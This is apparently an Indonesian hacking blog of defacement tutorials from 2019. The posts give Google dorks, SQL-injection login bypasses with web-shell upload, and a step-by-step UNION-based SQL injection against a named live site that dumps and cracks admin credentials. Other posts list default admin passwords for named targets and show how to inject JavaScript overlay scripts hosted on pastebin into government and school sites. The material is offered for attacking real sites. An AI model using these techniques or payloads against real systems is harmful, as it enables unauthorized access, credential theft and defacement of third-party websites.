Selasa, 10 Desember 2019

Deface Poc CMS Anch Technologies Login Vulnerability UPLOAD SHELL !


Langsung aja tanpa basa basi anjay :v
Bahan:
->Dork:
"Powered by Anch Technologies."
(Kembangin lagi jan dimodalin mulu asw)
->Exploit
/admin
site.com/admin
->Shell
Kalau ngga punya bisa klik disini
Password:NJ404NFGanss
Step by Step:
1.Kita dorking dulu di google search

2.Pilih target yang pengen lu tusbool, lalu cari tempat admin login nya
site.com/admin

3.Setelah masuk ke admin nya kita isi username dan password seperti bypass admin/bypass sql login
'="or' atau ' or 1=1 limit 1 -- -+
4.Setelah itu langsung redirect ke dashboard nya
5.Cari tempat buat upload shell.Disini saya mengupload nya di galery

6.Lalu klik lagi ke galery dan klik all galery(setiap site beda bosque jadi ya use your brain ea :"v
7.Akses shell nya dengan mengklik tahan pada gambar pecah/rusak (kalau lu uploadnya di galery)
8.Dan boom kita masuk ke shell anjay :v

Note:
->Kalau mau tebas index nya jangan lupa di backup -,- 
Lu kira buat web mudah apa. :)
->Ya kalau mau di report ke adminnya juga bisa :v kali aja lu dapet duit :v tapi lu jangan mengaharap imbalan lah asw :"v

Sekian dulu tutor dari gw :v
Sampai jumpa di tutor selanjutnya :*

Author:NJ404NF
Greets:TroubleMaker Crew

Kamis, 05 Desember 2019

Cara Sql Injection Secara Manual With Live Target


Apa itu SQL Injection?
Sql injection adalah sebuah teknik hacking yang dilakukan dengan menyisipkan baris kode SQL pada kotak isian (misalnya form login) atau pada url yang mana serangan ini akan mempengaruhi logika dari website tersebut.
Ok jadi itu sedikit pengertian mengenai SQL Injection dan sekarang kita akan mempraktekkannya :v

1.Dork:
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
(Kembangin lagi gan)

Disini gw udah kasih live target ya mhankk biar lu bisa nyoba nyoba ea :v
Live target: http://www.tnla.com/events.php?id=13

1.Pertama kita cek websitenya vuln atau ngga dengan cara menambahkan string di angka (')
http://www.tnla.com/events.php?id=13'
Kalo vuln pasti ada tulisan:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '.' limit 1' at line 1
tapi ngga cuma tulisan biasanya ada juga yang ngeblank atau ada gambar yang hilang(masih banyak lgi error nya)

2.Setelah itu kita mencari dan menghitung jumlah tabel yang ada di database web tersebut dengan cara +order+by+

http://www.tnla.com/events.php?id=13+order+by+1--+-
(Ngga error)
http://www.tnla.com/events.php?id=13+order+by+2--+-
(Ngga error)
http://www.tnla.com/events.php?id=13+order+by+3--+-
(Error)
Nah disini kita menemukan kalau error nya ada di angka 3 brarti jumlah table nya cuma ada 2
3.Lalu kita cari angka togel nya dengan cara +union+select
http://www.tnla.com/events.php?id=13+union+select+1,2--+-

nah disini bisa kita lihat muncul angka 2 brarti itu angka togelnya πŸ™‚
Fungsi angka togelnya nanti buat kita inject nya gan

4.Setelah ketemu angka togelnya kita lihat dulu versi berapa dengan cara @@version
http://www.tnla.com/events.php?id=13+union+select+1,@@version--+-

Bisa kita lihat kalau versi 5.7.28 
nah fungsinya melihat versinya karena kalau versi 4 ke bawah nanti ribet gan soalnya di versi 4 kita harus menebak 1 per 1 tabel yang ada pada databasenya

5.Setelah melihat versinya kita munculin databasenya gunakan perintah
group_concat(table_name)
Dan menambahkan
from+information_schema.tables+where+table_schema=database()
Sesudah angka terahkir
Karena disini live targetnya tabel cuma 2 dan angka togelnya di angka 2 maka seperti ini
http://www.tnla.com/events.php?id=13+union+select+1,group_concat(table_name)from+information_schema.tables+where+table_schema=database()--+-
Nah disitu bisa kita lihat kalau banyak nama nama tabel nya
ad,admin_settings,admin_users 
dan masih banyak lagi tabelnya

6.Langkah selanjutnya kita mencari Username dan Password yang ada di tabel tersebut. Nah di situ nama tabelnya admin_users 
Perlu diketahui nama tabel adminnya tidaklah sama,maka sobat harus menebak di mana yang menurut sobat curigai username dan password admin berada
Nah disini gw make dios aja gan :" biar mudah. 
Dios:
concat_ws(0x3a,username,password)from+admin_users--+-
(ganti admin_users dengan tabel yang kalian temukan untuk user password admin)

http://www.tnla.com/events.php?id=13+union+select+1,concat_ws(0x3a,username,password)from+admin_users--+-

7.Ok dari situ keluar user passwordnya gan 
user:admin
password:c2d0d2b7bf75a11ad8dbcd87e082a842
Nah itu hash MD5 kita bisa hash di
setelah di hash maka ketemu hasil hash nya
sebelum di hash:c2d0d2b7bf75a11ad8dbcd87e082a842
setelah di hash:01nursery

8.Nah setelah menemukan username dan password adminnya kita harus mencari halaman login / tempat login adminnya kalian bisa menggunakan tools online admin finder di google banyak gan😁

Ok sekian dulu dari saya.Jangan katakan sulit lah gabisa lah intinya kalo kita mau belajar sungguh sungguh dan niat pasti bisa secara perlahan-lahan,jadi buat kalian tetap semangat gan perlahan kalian pasti bisa..

Author:NJ404NF
Greets:TroubleMaker Crew

Minggu, 24 November 2019

Deface Poc u/p default cwcontrol with live target


Kembali lagi ama gw NJ404NF kali gw mau ngeshare tentang deface (Wanjay ngepepes troos ampe bosen :v )
Tanpa basa basi monggo disimak :*
Bahan:
1.Dork: inurl:/cwcontrol (Kembangin lagi)
2.Internet :v
3.Chrome/Browser
4.Udut :v biar paru paru lu semel :)
5.Target:http://www.itm-eng.com/
Step by Step
1.pertama lu ngedorking dulu gayn :v

2.lalu pilih salah satu web yang pengen lu tusbool :"

3. Cari tempat login nya biasanya tempat loginnya ada di cwcontrol
contoh:site.co.il/[patch]/cwcontrol
menjadi:site.co.il/cwcontrol
4.Masukin User Passwordnya
User:admin
Password:cw774411


5.Kalo vuln lu langsung di arahin ke dashboard nya gayn :v
Kalo ngga ya maap anda harus coba cari yang lain hehe :v

6.Setelah masuk ke dashboard terserah mau lu apain tu web :v
Bisa lu pastekan script deface lu
bisa juga lu pastekan script jso juga

Mirror? Ok√√
Hasil Pepes:
http://www.itm-eng.com/
http://www.perfectbuilt.com/

Sampai jumpa di tutorial selanjutnya :*
Author:NJ404NF
Greets:TroubleMaker Crew

Senin, 18 November 2019

Deface Poc Regmem


Heyooo wasap gais :v
Kembali lagi ama gw NJ404NF wanjay :V
Kali ini gw mau ngeshare tentang deface lagi :D 
Tapi kita bisa ngepepes web pemerintah lho :v bukan druppal pastinya
Langsung simak ae kuy :*
Bahan:
1.Dork: 
inurl:/register/artikel
inurl:kontributor site:go.id
(Kembangin lagi :vroo caranya ganti ae domainnya ke sch.id,.com)
2.Script Jso cara buat klik link di bawah :v
3.Internet :/
4.Chrome/browser
Step by Step
1.Ngedorking dlu di google slur :V
2.Pilih salah satu web yang ingin lu tusbool kalo vuln ada tempat registrasinya

3.Tulis ae asal asalan :v tapi di bagian verifikasi nya jgn asal asalan ikutin yang di verifikasinya
4.Setelah itu lu langsung di arahin ke dashboard nya :"v


5. klik garis 3 di bagian atas kiri ntar muncul menu kayak gini :v
Langsung ae klik menu modal berita trus klik berita

6.Setelah masuk ke berita klik tambahkan data

7.Tulis judul (ntar buat akses) lainnya tulis asal... oh iya :v di bagian isi berita klik sumber lalu masukin script jso lu... setelah itu klik tambahkan

8.Setelah itu kalau ada tampilan kayak gini brarti lu udh bisa akses...

9.Cara akses? site.co.il/nama judulnya
Kalo ngga bisa brarti gini site.co.il/berita/detail/nama judulnya
10.Mau di mirror? bisa kok :* di def.id
11.Happy deface

Hasil Deface :

See you di tutor selanjutnya :*
Author:NJ404NF
Greets:TroubleMaker Crew

Minggu, 17 November 2019

Deface Poc Jso


Haiii guys :D
Kembali lagi ama gw NJ404NF kali gw mau ngeshare tentang deface web sekolah? WoW web sekolah anjay :"v
Tanpa basa basi monggo disimak :*
Bahan:
1.Dork
"Aplikasi Sistem Informasi Kelulusan"
inurl:/bukutamu.html site:.sch.id
Kembangin lagi vroo biar fresh kayak hari hari ku dengan kamu :*
2.Exploit:
/admin/hubungi.php
3.Script Jso
>Cara membuat script Jso>>Touched me ><
4.Internet
5.Chrome/Browser
Step by Step:
1.Kalian ngedorking dlu di google >:(
2.Pilih salah satu web yang ingin lu tusuk >///<

3.Setelah itu klik tombol hubungi kami
4.Lalu isi kolom terserah mau di isi apa kecuali di bagian pesan kalian isi dengan script jso kalian
5.Setelah itu tambahkan exploit /admin/hubungi.php di web tersebut menjadi site.sch.id/[patch]/admin/huhungi.php
contoh:
https://smk5palembang.sch.id/kelulusanxyz/admin/hubungi.php
6.Mirror? Bisa kok di https://defacer.id
6.Happy deface :D


Author:NJ404NF
Greets:TroubleMaker Crew

Cara Membuat Script JSO

Kembali lagi ama gw NJ404NF kali gw mau berbagi tentang cara membuat script JSO.
Tapi apa itu JSO?
Jso adalah singkatan dari JavaScript Overlay
Para defacer menggunakan jso untuk mengubah tampilan website dengan script simple.
Ok tanpa basa basi berikut Step by Stepnya:
1.Pertama kalian klik link di bawah ini
>>Sentuh aku mazz :*
2.Lalu masukin script deface lu
3.Klik Convert
4.Copy code hexal desimalnya

5.Lalu masuk ke https://pastebin.com/ dan klik new paste

6.Ketik code berikut di new paste
document.documentElement.innerHTML=String.fromCharCode(code hexal)
Contoh:
document.documentElement.innerHTML=String.fromCharCode(6,7,8,9,3) 
di new paste,kemudian klik create new paste
7.Setelah itu klik raw
8.Lalu copy link dari hasil pastebin mu tadi
9.Masukin link yang tadi ke kode berikut

<script type="text/javascript" src="link pastebinmu"></script>
Contoh:
<script type="text/javascript" src="https://pastebin.com/raw/zZLe4HYW"></script>

Selesai... Sampai jumpa di tutorial selanjutnya

Author:NJ404NF
Greets:TroubleMaker Crew

Sabtu, 16 November 2019

JSO Creator

JSO Creator

Tools Jso Creator





@2k19 Copyright by NJ404NF